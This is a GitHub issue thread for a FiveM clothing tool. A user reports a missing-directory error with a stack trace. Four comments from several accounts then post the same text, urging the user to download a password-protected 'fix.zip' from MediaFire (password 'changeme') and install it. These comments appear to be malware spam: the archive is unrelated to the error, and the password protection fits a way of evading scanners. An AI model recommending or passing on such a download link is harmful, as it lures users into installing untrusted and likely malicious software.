### ISSUE TITLE
rg"vr"vb

### ISSUE THREAD

**Issue by aronne0pefkkcpoekk** [DurtyFree/durty-cloth-tool#270]
I have the following error:
```
System.IO.DirectoryNotFoundException: Could not find a part of the path 'D:\Admiration FiveM\bb Pack Bomme Full\Projets\test\clothproject_test\data'.
   at System.IO.FileSystem.CreateDirectory(String fullPath, Byte[] securityDescriptor)
   at System.IO.Directory.CreateDirectory(String path)
   at I1GEsRAUvdspGNs9JlN9.KM7A8qvxIal(String , I1GEsRAUvdspGNs9JlN9 )
   at SpUROXeP7w7ek0JMB74.RysEkJeg6Zj83vmFcry.s4hedsvSl0(String  , Byte[]  , String  , Boolean  , Func`2  )
   at SpUROXeP7w7ek0JMB74.RysEkJeg6Zj83vmFcry.zgPeKZRQGw(List`1  )
   at SpUROXeP7w7ek0JMB74.RysEkJeg6Zj83vmFcry.SrGecsGMyn(List`1  )
   at SpUROXeP7w7ek0JMB74.RysEkJeg6Zj83vmFcry.VbAebaJHpZ()
   at gmYo3Ttx2H9cAepoDoo.xbt2n1touRZLZrOMwxw.kg7tSY4Rnc(Object  , RoutedEventArgs  )
   at System.Windows.EventRoute.InvokeHandlersImpl(Object source, RoutedEventArgs args, Boolean reRaised)
   at System.Windows.UIElement.RaiseEventImpl(DependencyObject sender, RoutedEventArgs args)
   at System.Windows.Controls.MenuItem.InvokeClickAfterRender(Object arg)
   at System.Windows.Threading.ExceptionWrapper.InternalRealCall(Delegate callback, Object args, Int32 numArgs)
   at System.Windows.Threading.ExceptionWrapper.TryCatchWhen(Object source, Delegate callback, Object args, Int32 numArgs, Delegate catchHandler)
```

App Version: **2.5.3.0**
Project targets: **0**
DLC name: **bb**
Collection name: ** // **
Project path: **D:\Admiration FiveM\bb Pack Bomme Full\Projets\test\clothproject_test**
Output path: **D:\Admiration FiveM\bb Pack Bomme Full\Projets\test**
Disable Extra Ymt Creation: **False**
Create Subfolder For Cloth Drawable Types: **False**
Replace settings enabled: **False // DLC: NoDlc**
Save File Version: **4**
```

Cloth files:
`[Please provide cloth files (ydd, ytd), cloth project and any other related files here + describe reproduction steps]`

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
